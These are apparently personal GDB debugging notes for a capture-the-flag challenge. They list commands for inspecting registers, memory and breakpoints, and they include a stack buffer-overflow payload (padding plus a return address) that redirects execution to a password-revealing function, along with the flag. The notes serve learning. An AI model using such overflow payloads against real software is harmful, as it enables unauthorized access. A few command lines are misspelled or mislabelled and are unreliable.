Debugging Notes for linux processes

info reg : display the register state.

info func : display the functions in the program

disass functionname : disassemble a function.

break *0x080484d4 : set a breakpoint at an interesting location. In this example the “checkpass” function looks interesting. We use r to let the program run up to the breakpoint.

We can confirm that the instruction pointer is in fact pointing to the address configured in our breakpoint:

info break : displays the breakpoints we have set.

del {breakpoint number from info break} : to remove a breakpoint.

x/20w $esp : display 20 words starting at the stack pointer.

x/32b $esp : display in bytes

x/s 0x80488a6 : display string at the specified address.

In this example, i used x/i {address} see something interesting being moved into the EAX register in a function id found with info func. Because the challenge is password related this makes me wonder if the developer is moving the password into a register to compare it to the user input:

run < <(python -c 'print "A" * 612 + "\x6f\x85\x04\x08"') : start the program with input piped from python. (Important to note there is a space between the < characters)

Note in this case, this is the eventual answer to this debug challenge and you can see that it would ultimately redirect execution to the access granted function that displays the password (the flag is {dropbear}).

Some other misc commands: print $esp : print a register of your choosing. print system : system address

set diasassembly-flavor intel : change to intel (usual in Windows) set diasassembly-flavor att : change to intel (usual in Linux)